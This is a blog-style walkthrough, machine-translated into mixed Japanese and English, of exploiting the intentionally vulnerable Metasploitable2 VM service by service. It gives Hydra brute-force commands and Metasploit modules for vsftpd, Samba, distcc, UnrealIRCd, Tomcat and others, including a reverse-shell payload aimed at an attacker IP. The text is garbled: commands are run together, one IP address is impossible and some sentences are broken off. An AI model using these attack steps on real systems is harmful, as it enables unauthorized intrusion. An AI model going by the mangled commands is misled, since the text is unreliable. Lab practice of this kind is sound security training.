Metasploitable2

Metasploitable は意図的に脆弱な Linux 仮想マシンです。

この VM はセキュリティ トレーニング、テスト セキュリティ ツール、共通の侵入テスト技術の練習に使用することができます。

インストールと設定

私たちはここで Metasploitable 2 (侵入テスト用のくそ脆弱なマシン)を悪用します

この Metasploiable2 マシンは https://information.rapid7.com/download-metasploitable-2017.html

インストールプロセスから取得します。

  1. VirtualBox を開き、”New” ボタンをクリックして新しい仮想マシンを作成します
  2. Virtual Machine name (Metasploitable2)
  3. Allocated amount of memory (preferably but not under 512mb)
  4. 既存のハードディスクファイルを使用します
  5. Rapid7 からダウンロードしてきた vmdk file
  6. 作成をクリックします…
      vmdk file (既存ハードディスクファイルを使用します)を選択し、仮想マシンを作成します。!!! Metasploitable2のインストールが完了したら、ネットワーク設定を行います。 設定/ネットワーク/アダプター イーサネットまたはワイヤレス

      詳細設定タブで、選択します。 Promiscuous Mode を Allow All

      Metasploitable2 マシンを起動し、バナー上で与えられた認証情報でログインしてみる…!!!!

      マシンのIPアドレスは、次のようにして探します。 コマンドをターミナルで実行

      ifconfig

      以上で設定完了です(日本語)。.Let’s Start Hacking…

      Scanning

      Scanning the Matasploitable 2

      As we noticed the machine of IP address is 192.168.0.0.0.130

      Kali Linux

      nmap -sV -p- 192.168.0.130

      異なる手法ですべてのポートを探索する.でスキャン開始しましょう。

      方法 1:

      ユーザー名として匿名、パスワードなしでログインします。

      匿名 FTP についてより詳細な情報が必要な場合は、こちらを参照してください。

      https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

      ftp 192.168.0.130

      方法 2 :

      Hydra による強引な方法ですが、ユーザー名とパスワードをカスタムリストにしていることが必要です。

      hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V

      与えられたファイルから各ユーザー名とパスワードを取って、ターゲット FTP サービスにログインしようと試みます。

      認証情報が見つかったら、直接ログインできます。

      ユーザー アカウントにログイン後、特権を昇格してルートアクセスを取得できます。

      方法3 :

      メタスプロイト フレームワークを使用して FTP を悪用する

      メタスプロイト フレームワーク コンソールを開き、vsftpd Backdoor exploit

      msfconsole
      Search vsftpd
      use exploit/unix/ftp/vsftpd_234_backdoor

      を検索する。

      show options

      set RHOSTS 192.168.0.130 --> <target IP address>exploit

      おめでとう、あなたはルートアクセスを得た

      22-…SSH

      Secure Shell (SSH) は、セキュリティで保護されていないネットワーク上で安全にネットワークサービスを操作するための暗号ネットワークプロトコルです。

      Exploiting SSH in Different Techniques

      Method 1

      Cracking Username and password with Hydra

      Hydra is an built-in tool in Kali-Linux used to Brute force attack is a trial and error method used by application program to decode encrypted data such as password or Data Encryption Standard (DES) keys, instead on employs the intellectual strategies (using brute force)(パスワードなどの暗証データを読み込むために、アプリケーションが徹底した努力を行って、知的戦略を用いるのではなく、力ずくで行う方法).

      hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>

      方法2

      Metasploitフレームワークを開く

      ターミナルを開いて以下のコマンドを入力してください:

      service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login

      set this auxiliary and see what it requires.

      set RHOSTS <target IP Address> --> in my case 192.168.0.130

      Set predefined Usernames list and Passwords List

      set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit

      It will take time-based your usernames and passwords List and It will notify with username: password and login with those credentials.これは、ユーザー名とパスワードリストを設定し、これらの証明書でログインします。

      ssh username@targetipaddress

      あなたはユーザー権限を持っていますが、すべてのタスクを実行できないので権限昇格を行ってルート権限を取得しようとします。

      23-TELNET

      Telnet は、インターネットのような TCP/IP ネットワーク上でリモート コンピュータにアクセスするために使用される、シンプルでテキスト ベースのネットワーク プロトコルです。 Telnet は 1969 年に作成され、開始されました。歴史的に見れば、それが最初のインターネットであると言うことができます。

      25-SMTP

      SMTP は、TCP/IP プロトコルのアプリケーション層に含まれています。 保存と転送」と呼ばれるプロセスを使用して、SMTP は電子メールをネットワーク上およびネットワーク間で移動します。 SMTPは、メール転送エージェント(MTA)と呼ばれるものと密接に連携し、通信を適切なコンピュータとメール受信箱に送信します。

      方法1:

      Metasploitを使用する

      コマンドを実行してMetasploitを起動する

      service postgresql startmsfconsole -qsearch smtp_version

      use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run

      SMTP とは Simple Mail Transport Protocol の略でサーバーからサーバーへの転送プロトコルです。を使用し、電子メールの送受信を行うユーザーのローカルデータベースを保持するプロトコルです。

      SMTP にはコマンド群があります。 25番ポートから「netcat」でターゲットに接続し、このデータベースのメールを取得することを試みます。

      新しいターミナルを開き、次のように入力します。

      nc 192.168.0.130 25

      これで接続は確立しましたので、SMTPコマンド

      Type: vrfy user

      vrfy (これは非同期式)で確認することができます。インタラクティブシェル)

      SMTPコマンドはこちらへどうぞ。 http://www.tcpipguide.com/free/t_SMTPCommands-2.htm

      方法2

      Using smtp_enum

      これは Metasploit

      search smtp_enum

      によって行うことができる。

      use auxiliary/scanner/smtp/smtp_enum

      show optionsset RHOST 192.168.0.130exploit

      この方法はSMTPサービスにおけるユーザーのこのリストを見つけるために列挙を使用しています。

      後に NetCat はそのユーザーとの逆接続を得るのに役立ちます。

      139&445 Netbios-SSN

      Sambaはオープンソースプロジェクトで、LinuxやUnixコンピューターで広く使われており、Windowsファイルやプリントサービスを使用することが可能です。

      エクスプロイトの検索

      use exploit/multi/samba/usermap_script

      Exploit のオプションを表示するには

      show optionsSet RHOST192.168.0.130 (Target IP address)

      ペイロードを設定する

      Show payloadsSet payload cmd/unix/reverse

      Payloadに必須の引数を設定する

      Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444

      すべての必須引数が満たされたらチェック

      exploit

      1099-Java->

      Remote Method Invocation (RMI) は、あるオブジェクトが別のアドレス空間に存在するオブジェクトのメソッドを呼び出すことができるAPIである。 同じマシンかリモートマシンにある可能性があります。

      Exploiting java-RMI-server

      search for the exploit

      search java_rmi_server

      exploitをそのランクにより選択。例えば、「excellent」は「normal」よりも効果的です。

      use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit

      対象マシンにアクセスできた。

      1524-BINDSHELL

      Bind shellとはシェル型の一つで、対象マシンから通信ポートまたは被害マシン上のリスナーをオープンして着信待ちをするものです。 攻撃者は、被害者マシンのリスナーに接続し、サーバー上でコードまたはコマンドの実行につなげます。

      nc <target ip address> 1524

      Congratulations, You are a root user now.

      2121-ProFTPD

      このポートを悪用する前に、ブルートフォース技術でそれを取得する方法を知っているので、ログイン資格情報を持っている必要がある、我々はtelnetでProFTPdにアクセスできます、ここではユーザー:ユーザーを使っています。

      telnet <Taget IP Address> <Port Number>USER <username>
      PASS <password>

      これは通常のユーザーです。

      3306-MYSQL

      方法1:

      search for the exploit

      search scanner/mysql/mysql_login

      use auxiliary/scanner/mysql/mysql_login

      MySQLのパスワードが空白の場合があります。

      注意: デフォルトでは、BLANK_PASSWORDS は false と表示されるので、それを true に設定します。

      set BLANK_PASSWORDS as true

      Method:2

      この方法では、ユーザー名を root、ターゲットIPを指定してこのコマンドで MySQL を悪用しようとするものである。

      mysql -u root -h <target's IP>

      3632-DISTCCD

      Distcc はコンピュータ ネットワーク上の分散コンピューティングを使用してソースコードのコンパイルを高速化するためのツールです。 正しい設定により、

      distcc はプロジェクトのコンパイル時間を劇的に短縮することが可能です

      Exploiting port 3632 using distcc-

      3632-DISTCCD

      Distcc- Distcc-

      msfconsole を開いて distcc_exec を検索

      search distcc_execshow options

      必要な引数を設定して悪用

      set RHOSTS <target-ip>exploit

      Shell Access を取得しました…」。より高い権限を得るために権限昇格を試みる

      postgre_payloadでPostgreSQLを探る

      msfconsoleを開く & search for postgres_payload

      search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options

      Set required arguments for exploit

      set RHOSTS <target-ip>

      By default, ユーザー名をpostgresとします

      exploit

      Successfully logged in postgresql…。もっといろいろできるようにシェルを取得しよう…

      privilege escalationをやってみよう…Happy learningです。.!!!

      5900-VNC

      msfconsole を開き、exploit vnc_login

      search vnc_loginuse auxiliary/scanner/vnc/vnc_login

      show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
      を検索してください。

      この方法は、Linux または Unix または Windows オペレーティング システムでホストされている VNC ソフトウェアに認証の脆弱性があることを利用するために使用されます。

      そのパスワードでvnc接続を試みる

      ターミナルでVncビューアを開く&IPアドレスを入力し接続

      ログインプロンプトがポップアップ表示される。 と表示され、認証情報の入力を求められます

      そこでパスワードを入力しOKボタンをクリックしてください。

      Voilaaa…!!!You got Access…I know what are you thinking right Now… Don’t mess with the things around…..Happy Learning.

      6000-X11

      Xウィンドウシステム(別名X)は、ビットマップディスプレイのためのウィンドウシステムで、UNIXベースのオペレーティングシステムで一般的なものである。 X は GUI ベースの環境のための基本的なフレームワークを提供します。

      リモート X11 サーバは、インターネット接続が可能な場所ならどこからでも接続を受け付けます。 これは、コンピュータまたはワイヤレスデバイスのグラフィックカード、入力デバイス、およびディスプレイ画面へのアクセスを担当する。

      Exploiting port 6000 using ssh

      ssh -X -l msfadmin 192.168.0.122

      上記のコマンドでは ‘X’ がすべてのポート転送を有効にしています。 ユーザー名とターゲットの IP を指定することで、シェル

      6667 & 6697 UnrealIRCD

      UnrealIRCd はオープンソース IRC サーバで 1999 年から多くのネットワークに提供されているものです。 Linux、OS X、および Windows で動作します

      UnrealIRCd は、モジュール性、高度な設定可能な設定ファイルに重点を置いた、高度な IRCd です。 主な機能としては、SSL

      UnrealIRCd は、最も人気のあるフル機能の IRC デーモンの 1 つで、最も多くの IRC サーバーで使用されています

      このサーバーは、おそらくあらゆる IRC サーバーの中で最もセキュリティ機能を備えていると言われています

      使用されるプロトコル。 Internet Relay Chat

      Let’s Exploit this IRC Server.

      方法1: ポート 6667

      search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options

      exploit

      set RHOSTS <target-ip>

      の必須引数をセットする。

      デフォルトでは、6667のポート番号がexploit

      run (or) exploit

      Heyyyy….ルートを確保した…ギリギリのところで生きている…

      Method 2: ポート6697

      上記の悪用と必要な引数を設定する

      • 今回はポートを6697
      set RHOSTS <target-ip>set RPORT 6697

      そして二度目のルート獲得…。8114>

      8180-TOMCAT

      Apache Tomcat は、Java Servlet、JavaServer Pages、Java Expression Language、および WebSocket 技術のオープンソースの実装です。 Tomcatは、Javaコードが実行可能な「ピュアJava」HTTP Webサーバ環境を提供します。

      Exploiting Apache-Tomcat

      それは2つのステップで完了できます。

      Open msfconsole & search for tomcat_mgr_login

      search tomcat_mgr_loginset RHOSTS <target-ip>

      show options

      搾取はデフォルトユーザー名を&パスワードリストを割り当てています。 exploitに引数を設定した後 exploitを入力(または)実行

      同じユーザー名とパスワードを取って次の exploit に渡します。

      search for tomcat Manager exploits

      search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options

      RHOSTS, RPORTとtomcat login exploitから得たHttpPassword、HttpUsernameを設定し、exprokeitを実行します。

      msfconsole は exploit に適した payload を指定できるため meterpreter…

      87-Ruby-drb

      dRuby とは ruby 用分散オブジェクトシステムであり、ruby を使用することができます。 純粋なRubyで書かれており、そのプロトコルを使用します。

      TCPソケットのような、Rubyランタイムが提供する以上のアドオンサービスは必要ありません。

      search drb_remote_codeexec

      必要な引数を設定する

      show optionsset RHOSTS <target-ip>exploit (or) run

      おめでとう、あなたは root シェルアクセスを取得しました.いくつかのシェルコマンドを使ってみてください(8114>)

コメントを残す

メールアドレスが公開されることはありません。